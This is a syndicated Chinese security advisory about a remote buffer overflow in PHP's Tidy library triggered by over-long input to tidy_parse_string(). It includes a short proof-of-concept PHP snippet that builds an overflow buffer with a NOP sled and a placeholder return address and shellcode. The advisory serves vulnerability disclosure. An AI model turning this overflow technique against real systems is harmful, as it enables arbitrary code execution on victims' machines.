作家
登录

PHP Tidy库远程缓冲区溢出漏洞

作者: 来源: 2012-06-12 22:52:59 阅读 我要评论

发布日期:2007-06-19
更新日期:2007-06-20

受影响系统:
C. Reitzel TidyLib for PHP 050506
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 24527

Tidy库用于改正HTML文档中的常见错误并生成格式编排良好的等价文档,还可以生成XHTML格式的文档。

Tidy库实现上存在缓冲区溢出漏洞,攻击者可能利用此漏洞通过诱使用户处理恶意文档执行恶意指令。

PHP所使用的Tidy库中没有正确验证对tidy_parse_string()和tidy_repair_string()函数的输入。如果用户向这些函数传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意指令。

<*来源:rgod (rgod@autistici.org) *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested; //0x7C81518B      call esp kernel32.dll
$NOP=str_repeat("x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

C. Reitzel
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://dev.int64.org/tidy.html

【绿盟授权51CTO.COM 独家报道,未经书面许可不得转载!】

  推荐阅读

  AOL Instant Messenger SIP INVITE消息远程拒绝服务漏洞

【51CTO.com 独家消息】发布日期:2007-06-19 更新日期:2007-06-20受影响系统: AOL Instant Messenger 6.1.32.1 描述: -------------------------------------------------------------------------------->>>详细阅读


本文标题:PHP Tidy库远程缓冲区溢出漏洞

地址:http://www.17bianji.com/anquan/buding/2726.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)